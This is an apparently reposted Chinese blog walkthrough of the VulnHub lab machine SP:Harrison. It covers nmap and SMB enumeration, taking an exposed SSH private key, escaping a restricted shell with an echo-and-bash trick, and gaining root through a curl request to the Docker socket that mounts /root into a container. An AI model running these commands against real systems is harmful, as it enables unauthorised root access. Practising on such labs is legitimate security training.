zoukankan      html  css  js  c++  java

  • vulnhub之SP:Harrison靶机

    下载地址:‘https://www.vulnhub.com/entry/sp-harrison,302/’

    环境:靶机放在virtualbox上运行,网卡模式

     攻击机:kali Linux运行在VMware,注意网络模式选择桥接,并且桥接在virtualbox的虚拟网卡上

    现在开始进入主题

    首先使用netdiscover开启网络发现

    发现了几个网段,因为靶机和我们是连接在同一张网卡,kali地址是192.168.163.0网段,那就上nmap这个工具

    扫网段发现192.168.163.3这个机子是在vir上运行,靶机无疑。直接使用nmap -A 192.168.163.3 -p 1-65535 进行全扫描

    有22,445端口

    445 端口运行samba服务,是Linux下的一个共享服务,可以使用enum4linux 进行一个枚举

    22端口运行ssh服务,并在扫描信息中发现了一个用户harrison,因为ssh算一个比较完善的服务,漏洞利用少,爆破也是不错的选择

     

     使用enum4linux进行枚举,发现了一个共享文件夹Private

     

     我们在使用smb客户端进看看是否是匿名共享,确实是匿名, -L   显示服务器端所分享出来的所有资源

    直接连接smb的命令和ftp区别不大,ls一下文件发现了两个可以的.ssh目录可能存在密钥对,使我们ssh连接的时候使用私钥不用密码

    flag.txt可能是我们这一关的终点站

    下载到本地

     查看内容,flag.txt经百度翻译为不会那么容易的。

    id_rsa存私钥

    authorized_keys里面存在着一份公钥,且有root字眼存在,不知道会不会是坑

     

    使用ssh连接发现root使用不了私钥,我们前面扫描出一个用户搞好成功了,但是发现只能使用几个命令,受到限制

     

     试试绕过,在次基础是新建一个shell终端进行绕过,最后成功了echo && 'bash'

    echo 输出 &&与逻辑前面命令成功继续执行后面的所以shell就成功了

    找到两个flag文件都不是,不过root下的flag有执行权限,应该是他,所以我们要进行提权

     收集信息

    uname -a # 查看内核/操作系统/CPU信息

     cat /etc/issue,此命令也适用于所有的Linux发行版

    得到几个有用的信息

     找内核有没有漏洞,很不幸没有找到,可能是我的searchsploit太久没更新了,也有可能是这个版本还没有爆出漏洞,比竟这个靶机是5月份

    上传LinEnum.sh

     下载地址https://github.com/rebootuser/LinEnum.git

    运行kali上的python形成一个简单的HTTP服务,记得放LinEnum脚本的地方最好在本地浏览器试一下

     

     在靶机是属于wget下载脚本,运行,先给脚本可执行权限

     

    查看一下suid(可以让调用者以文件拥有者的身份运行该文件)就是以root的权限运行

    (Nmap Vim find Bash More Less Nano cp)

     到这里我熟悉的就用完了,想了一下,还有docker,进去/run查看一下运行文件,发现了docker.sock

     谷歌上搜了一会发现两篇文章

    https://blog.fundebug.com/2017/04/17/about-docker-sock/

    https://www.freebuf.com/articles/system/201793.html

     

    本地命令好像是这样子,但是我们要新建一个容许来挂载/root,所以要改一下poc

     试一下,

    curl  -XPOST  -H 'Content-Type: application/json' --unix-socket /var/run/docker.sock  -d '{"Image":"ubuntu","Cmd":["/bin/sh"],"DetachKey":"ctrl-p,ctrl-q","Mounts":[{"Type":"bind","Source":"/root/","Target":'/os_root'}]}'   http://localhost/containers/create

    -XPOST 发送post请求

    -h 添加请求头

    Image 创造镜像名称

    attach进入Docker容器,指定退出attach模式的快捷键序列,默认是CTRL+p CTRL-q

    Cmd 执行的命令

    Mounts 挂载 ,将root挂载在容器的os_root

    --unix-socket 指定 unix socket 文件的地址 ,监听地址不是 IP:Port 而是 unix socket 的程序

    curl --unix-socket /var/run/docker.sock http://localhost/images/json 获取所有的容器这个命令或许有用记下来

    nc -U /var/run/docker.socket

     nc不是脑残的缩写,是net cat的缩写。-U指明是unix socket

     不知道传啥,然后又找到这个

     改一下我们的poc

    curl  -XPOST  -H 'Content-Type: application/json' --unix-socket /var/run/docker.sock  -d '{"Image":"ubuntu","Cmd":["/bin/sh"],"DetachKey":"ctrl-p,ctrl-q","OpenStdin":true,"Mounts":[{"Type":"bind","Source":"/root/","Target":"/os_root"}]}'   http://localhost/containers/create

    成功提权,root

     
  • 相关阅读:
    webapi 获取json数据
    js的匿名函数与自定义函数
    深入理解计算机系统 第八章 异常控制流(2)
    深入理解计算机系统 第八章 异常控制流(1)
    深入理解计算机系统 第三章 程序的机器级表示(2)
    深入理解计算机系统 第三章 程序的机器级表示(1)
    深入理解计算机系统 第二章 信息的表示和处理(2)
    深入理解计算机系统 第二章 信息的表示和处理(1)
    深入理解计算机系统第一章,计算机系统漫游
    Leetcode练习(Python):第292题:Nim 游戏:你和你的朋友,两个人一起玩 Nim 游戏:桌子上有一堆石头,每次你们轮流拿掉 1
  • 原文地址:https://www.cnblogs.com/heguoze/p/12034411.html
Copyright © 2011-2022 走看看